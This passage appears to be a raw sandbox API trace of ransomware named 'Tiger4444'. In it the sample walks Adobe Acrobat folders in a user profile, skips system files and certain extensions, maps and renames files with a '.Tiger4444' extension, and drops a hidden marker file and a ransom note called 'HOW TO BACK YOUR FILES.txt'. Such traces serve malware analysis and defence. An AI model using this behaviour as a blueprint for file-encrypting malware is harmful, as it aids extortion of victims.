dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.433] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.433] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.433] CloseHandle (hObject=0x2b8) returned 1 [0059.433] CloseHandle (hObject=0x2c4) returned 1 [0059.433] GetCurrentThreadId () returned 0xfa8 [0059.434] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664c8 [0059.434] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache" [0059.434] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83790 | out: hHeap=0xc50000) returned 1 [0059.434] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664c0 | out: hHeap=0xc50000) returned 1 [0059.434] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache" [0059.434] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\" [0059.434] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\.BFC0E91B00AE8A0620D3" [0059.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.435] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.437] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.438] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.438] CloseHandle (hObject=0x2c4) returned 1 [0059.439] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache") returned 56 [0059.439] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.439] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b406794, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xe89495bf, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0x8871c114, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0059.439] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.439] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.439] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.439] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.439] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b406794, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xe89495bf, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0x8871c114, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.439] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.439] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.440] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.440] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.440] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.440] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8871c114, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8871c114, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8871c114, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.440] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.440] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.440] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636b588b, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x636b588b, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x636b588b, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GlobData", cAlternateFileName="")) returned 1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2="Tiger4444.exe") returned -1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2=".") returned 1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2="..") returned 1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2="windows") returned -1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2="bootmgr") returned 1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2="pagefile.sys") returned -1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2="boot") returned 1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2="ids.txt") returned -1 [0059.440] lstrcmpiW (lpString1="GlobData", lpString2="NTUSER.DAT") returned -1 [0059.440] lstrcpyW (in: lpString1=0x30aeb1a, lpString2="GlobData" | out: lpString1="GlobData") returned="GlobData" [0059.440] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData", dwFileAttributes=0x0) returned 1 [0059.441] lstrlenW (lpString="GlobData") returned 8 [0059.441] lstrlenW (lpString="Tiger4444") returned 9 [0059.441] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0059.441] lstrlenW (lpString=".dll") returned 4 [0059.441] lstrcmpiW (lpString1="Data", lpString2=".dll") returned 1 [0059.441] lstrlenW (lpString=".lnk") returned 4 [0059.441] lstrcmpiW (lpString1="Data", lpString2=".lnk") returned 1 [0059.441] lstrlenW (lpString=".ini") returned 4 [0059.441] lstrcmpiW (lpString1="Data", lpString2=".ini") returned 1 [0059.441] lstrlenW (lpString=".sys") returned 4 [0059.441] lstrcmpiW (lpString1="Data", lpString2=".sys") returned 1 [0059.441] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0059.441] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0059.441] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=15089439220) returned 1 [0059.441] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=22) returned 1 [0059.441] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0059.441] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0059.441] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x2cc [0059.445] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0xbe0000 [0059.446] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0059.446] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0059.446] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0059.446] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0059.446] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0059.446] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0059.446] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0059.446] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0059.447] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=15089964618) returned 1 [0059.447] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0059.447] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0059.447] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.447] CloseHandle (hObject=0x2cc) returned 1 [0059.447] CloseHandle (hObject=0x2b8) returned 1 [0059.447] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData.Tiger4444") returned 75 [0059.447] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata.tiger4444"), dwFlags=0x1) returned 1 [0059.448] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89495bf, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xe89495bf, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe89495bf, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GlobSettings", cAlternateFileName="GLOBSE~1")) returned 1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2="Tiger4444.exe") returned -1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2=".") returned 1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2="..") returned 1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2="windows") returned -1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2="bootmgr") returned 1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2="pagefile.sys") returned -1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2="boot") returned 1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2="ids.txt") returned -1 [0059.448] lstrcmpiW (lpString1="GlobSettings", lpString2="NTUSER.DAT") returned -1 [0059.448] lstrcpyW (in: lpString1=0x30aeb1a, lpString2="GlobSettings" | out: lpString1="GlobSettings") returned="GlobSettings" [0059.448] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings", dwFileAttributes=0x0) returned 1 [0059.448] lstrlenW (lpString="GlobSettings") returned 12 [0059.448] lstrlenW (lpString="Tiger4444") returned 9 [0059.448] lstrcmpiW (lpString1="bSettings", lpString2="Tiger4444") returned -1 [0059.448] lstrlenW (lpString=".dll") returned 4 [0059.448] lstrcmpiW (lpString1="ings", lpString2=".dll") returned 1 [0059.448] lstrlenW (lpString=".lnk") returned 4 [0059.448] lstrcmpiW (lpString1="ings", lpString2=".lnk") returned 1 [0059.448] lstrlenW (lpString=".ini") returned 4 [0059.448] lstrcmpiW (lpString1="ings", lpString2=".ini") returned 1 [0059.448] lstrlenW (lpString=".sys") returned 4 [0059.448] lstrcmpiW (lpString1="ings", lpString2=".sys") returned 1 [0059.448] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0059.449] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0059.449] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=15090180112) returned 1 [0059.449] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=24) returned 1 [0059.449] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0059.449] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0059.449] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x2cc [0059.450] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0xbe0000 [0059.451] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0059.451] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0059.451] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0059.451] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0059.451] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0059.451] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0059.451] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0059.451] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0059.451] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=15090453969) returned 1 [0059.451] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0059.452] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0059.452] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.452] CloseHandle (hObject=0x2cc) returned 1 [0059.452] CloseHandle (hObject=0x2b8) returned 1 [0059.452] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings.Tiger4444") returned 79 [0059.452] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings.tiger4444"), dwFlags=0x1) returned 1 [0059.453] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe89495bf, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xe89495bf, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe89495bf, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GlobSettings", cAlternateFileName="GLOBSE~1")) returned 0 [0059.453] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0059.453] lstrcpyW (in: lpString1=0x30aeb1a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.453] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.454] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.454] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.455] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.455] CloseHandle (hObject=0x2b8) returned 1 [0059.455] CloseHandle (hObject=0x2c4) returned 1 [0059.455] GetCurrentThreadId () returned 0xfa8 [0059.455] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666a8 [0059.455] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms" [0059.455] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0059.455] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666a0 | out: hHeap=0xc50000) returned 1 [0059.455] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms" [0059.455] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\" [0059.455] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\.BFC0E91B00AE8A0620D3" [0059.455] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\forms\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.457] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.478] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.481] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.481] CloseHandle (hObject=0x2c4) returned 1 [0059.481] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms") returned 54 [0059.481] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.481] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5163cbb3, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5163cbb3, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x887421e5, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0059.482] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.482] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.482] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.482] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.482] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5163cbb3, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5163cbb3, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x887421e5, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.482] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.482] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.482] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.482] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.482] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.482] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x887421e5, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x887421e5, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8878e672, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.482] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.482] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.482] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x887421e5, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x887421e5, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8878e672, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0059.482] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0059.482] lstrcpyW (in: lpString1=0x30aeb16, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.482] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\forms\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.482] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 